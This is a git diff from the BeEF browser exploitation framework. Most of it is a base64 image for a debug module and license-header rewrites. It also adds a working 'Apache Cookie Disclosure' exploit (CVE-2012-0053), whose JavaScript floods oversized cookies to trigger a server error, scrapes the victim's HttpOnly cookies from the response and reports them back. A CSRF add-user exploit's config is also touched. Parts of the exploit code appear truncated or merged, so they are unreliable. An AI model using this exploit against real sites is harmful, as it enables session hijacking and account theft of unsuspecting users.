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"); + +}); + diff --git a/modules/debug/test_return_image/config.yaml b/modules/debug/test_return_image/config.yaml new file mode 100644 index 000000000..cf54bd08e --- /dev/null +++ b/modules/debug/test_return_image/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + test_return_image: + enable: true + category: "Debug" + name: "Return Image" + description: "This module will test returning a PNG image as a base64 encoded string. The image should be rendered in the BeEF web interface." + authors: ["bcoles"] + target: + working: ["ALL"] diff --git a/modules/debug/test_return_image/module.rb b/modules/debug/test_return_image/module.rb new file mode 100644 index 000000000..893ab7911 --- /dev/null +++ b/modules/debug/test_return_image/module.rb @@ -0,0 +1,14 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Test_return_image < BeEF::Core::Command + + def post_execute + content = {} + content['image'] = @datastore['image'] + save content + end + +end diff --git a/modules/debug/test_return_long_string/command.js b/modules/debug/test_return_long_string/command.js index da26b067d..1c8f06889 100644 --- a/modules/debug/test_return_long_string/command.js +++ b/modules/debug/test_return_long_string/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var repeat_value = "<%= @repeat_string %>"; diff --git a/modules/debug/test_return_long_string/config.yaml b/modules/debug/test_return_long_string/config.yaml index c44d85390..6451db22a 100644 --- a/modules/debug/test_return_long_string/config.yaml +++ b/modules/debug/test_return_long_string/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/debug/test_return_long_string/module.rb b/modules/debug/test_return_long_string/module.rb index 4e1edc68f..77f4b86dc 100644 --- a/modules/debug/test_return_long_string/module.rb +++ b/modules/debug/test_return_long_string/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Test_return_long_string < BeEF::Core::Command diff --git a/modules/exploits/apache_cookie_disclosure/command.js b/modules/exploits/apache_cookie_disclosure/command.js new file mode 100644 index 000000000..b695e4838 --- /dev/null +++ b/modules/exploits/apache_cookie_disclosure/command.js @@ -0,0 +1,75 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +// BASED ON https://gist.github.com/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7fb08 + +beef.execute(function() { + + function setCookies (good) { + + var str = ""; + + for (var i=0; i< 819; i++) { + str += "z"; + } + + for (i = 0; i < 10; i++) { + + if (good) { // Expire evil cookie + var cookie = "beef" + i + "=;expires=" + new Date(+new Date()-1).toUTCString() + "; path=/;"; + } else { // Set evil cookie + var cookie = "beef" + i + "=" + str + "; path=/"; + } + document.cookie = cookie; + } + } + + function makeRequest() { + setCookies(); + + function parseCookies () { + var cookie_dict = {}; + + // React on 400 status + if (xhr.readyState === 4 && xhr.status === 400) { + + // Replace newlines and match 
 content
+				var content = xhr.responseText.replace(/\r|\n/g,'').match(/
(.+)<\/pre>/);
+				
+				if (content.length) {
+					
+					// Remove "Cookie:" prefix
+					content = content[1].replace("Cookie: ", "");
+					
+					var cookies = content.replace(/beef\d=z+;?/g, '').split(/;/g);
+					
+					// Add cookies to object
+					for (var i=0; i", <%= @command_id %>, "cookies="+result);
+	
+			}
+		}
+		
+		// Make XHR request
+		var xhr = new XMLHttpRequest();
+		xhr.onreadystatechange = parseCookies;
+		xhr.open("GET", "/", true);
+		xhr.send(null);
+	}
+
+	makeRequest();
+
+});
\ No newline at end of file
diff --git a/modules/exploits/apache_cookie_disclosure/config.yaml b/modules/exploits/apache_cookie_disclosure/config.yaml
new file mode 100644
index 000000000..e8f0fcf47
--- /dev/null
+++ b/modules/exploits/apache_cookie_disclosure/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        apache_cookies:
+            enable: true
+            category: "Exploits"
+            name: "Apache Cookie Disclosure"
+            description: "This module exploits CVE-2012-0053 in order to read the victim's cookies, even if issued with the HttpOnly attribute. The exploit only works if the target server is running Apache HTTP Server 2.2.0 through 2.2.21."
+            authors: ["gcattani"]
+            target:
+                working: ["All"]
diff --git a/modules/exploits/apache_cookie_disclosure/module.rb b/modules/exploits/apache_cookie_disclosure/module.rb
new file mode 100644
index 000000000..22115ed86
--- /dev/null
+++ b/modules/exploits/apache_cookie_disclosure/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Apache_cookies < BeEF::Core::Command
+
+	def post_execute
+		content = {}
+		content['apache_cookies'] = @datastore['apache_cookies']
+		save content
+	end
+
+end
diff --git a/modules/exploits/axous_1_1_1_add_user_csrf/command.js b/modules/exploits/axous_1_1_1_add_user_csrf/command.js
index bfa12a6a6..21b66e983 100644
--- a/modules/exploits/axous_1_1_1_add_user_csrf/command.js
+++ b/modules/exploits/axous_1_1_1_add_user_csrf/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 	var base     = '<%= @base %>'; 
 	var username = '<%= @username %>';
diff --git a/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml b/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml
index 4231dc7e8..7a15e558e 100644
--- a/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml
+++ b/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
@@ -22,4 +12,4 @@ beef:
             description: "Attempts to add a user to an Axous <= 1.1.1 install (CVE-2012-2629)."
             authors: ["bcoles", "Ivano Binetti"]
             target:
-                working: ["ALL"]
+                unknown: ["ALL"]
